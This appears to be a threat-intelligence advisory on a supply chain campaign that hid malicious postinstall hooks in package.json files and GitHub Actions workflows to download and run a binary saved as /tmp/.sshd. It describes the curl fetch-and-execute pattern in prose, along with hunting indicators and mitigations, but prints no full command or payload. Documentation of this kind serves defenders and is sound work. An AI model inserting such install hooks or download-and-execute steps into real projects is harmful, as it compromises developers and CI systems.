Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects

What Happened

Security researchers discovered a widespread attack where malicious instructions were hidden inside the installation files of over 700 open-source software projects. Developers and organizations using these compromised projects, specifically those combining PHP and JavaScript tools, are at risk. When the software is installed, the hidden instructions automatically download and run a malicious program in the background, potentially giving attackers control over the victim's computer or company servers. Organizations should carefully review the installation scripts of their open-source software and monitor their systems for unauthorized background programs.

Key Takeaways

• A coordinated supply chain campaign compromised over 700 GitHub repositories by injecting malicious postinstall hooks into package.json files.
• The attack specifically targeted PHP Composer packages that bundle JavaScript build tooling, exploiting a blind spot where developers might only review composer.json.
• The malicious script downloads a Linux binary (gvfsd-network) from a GitHub Releases URL, saves it as /tmp/.sshd, and executes it in the background.
• The same payload was also found injected into GitHub Actions workflow files under the guise of a 'Dependency Cache Sync' step.
• Laravel starter kits (e.g., devdojo/wave, devdojo/genesis) were among the most impacted, as their package.json files land at the project root where npm install runs scripts directly.

Affected Systems

• Linux environments running Node.js (npm install) or GitHub Actions CI/CD pipelines
• PHP Composer projects that bundle JavaScript build tooling (e.g., Laravel starter kits)

Attack Chain

The attacker compromises upstream GitHub repositories and injects a malicious postinstall script into package.json or a malicious step into GitHub Actions workflow files. When a victim installs the package via npm install or triggers the CI/CD pipeline, the script executes. It uses curl to download a Linux binary (gvfsd-network) from an attacker-controlled GitHub Releases URL without TLS verification. The binary is saved to /tmp/.sshd, made executable, and launched in the background to establish a foothold.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules but outlines behavioral indicators such as suspicious curl commands in postinstall scripts and GitHub Actions workflows.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions should easily detect a Node.js or CI/CD runner process spawning a shell that uses curl to download an executable to /tmp and immediately runs it. Network Visibility: Medium — The download occurs over HTTPS from a legitimate domain (github.com), making network-based detection difficult without SSL inspection or specific URL path monitoring. Detection Difficulty: Moderate — While the behavior is highly suspicious, the use of legitimate platforms (GitHub Releases) and standard tools (curl, npm) requires correlating process ancestry to avoid false positives.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon Event ID 1)
• File Creation (Sysmon Event ID 11)
• Linux Auditd (execve)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for package managers (npm, yarn) or CI/CD runner processes spawning shell commands that download files to hidden paths in /tmp.	Process execution logs (Linux auditd, EDR process telemetry)	Execution	Low
Identify instances of 'curl' executing with flags '-skL' downloading files directly to hidden files (starting with '.') in the /tmp directory.	Command line execution logs	Command and Control	Low

Control Gaps

• Lack of integrity checks on postinstall scripts
• Over-reliance on Composer metadata scanning while ignoring bundled package.json files in PHP projects

Key Behavioral Indicators

• Process ancestry: npm/node -> sh -> curl
• File creation: /tmp/.sshd
• Execution of hidden files in /tmp

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Audit projects using PHP Composer that also bundle JavaScript tooling for unexpected package.json postinstall scripts.
• Search CI/CD environments and GitHub Actions workflows for unauthorized steps, specifically looking for 'Dependency Cache Sync' executing curl commands.

Infrastructure Hardening

• Consider disabling lifecycle scripts (e.g., using npm install --ignore-scripts) in CI/CD pipelines where postinstall hooks are not strictly required.
• Implement network egress filtering on CI/CD runners to restrict outbound connections to approved domains and repositories.

User Protection

• Ensure developer workstations have EDR coverage capable of detecting suspicious child processes spawned by package managers.

Security Awareness

• Educate development teams on the risks of supply chain attacks targeting cross-ecosystem dependencies, such as JavaScript hooks embedded in PHP projects.

MITRE ATT&CK Mapping

• T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1105 - Ingress Tool Transfer
• T1564.001 - Hide Artifacts: Hidden Files and Directories

Additional IOCs

• File Paths:
  • /tmp/.sshd - Hidden file path used to store the downloaded malicious binary
• Command Lines:
  • Purpose: Download and execute malicious payload in the background while suppressing errors and bypassing TLS verification | Tools: curl, chmod, sh | Stage: Execution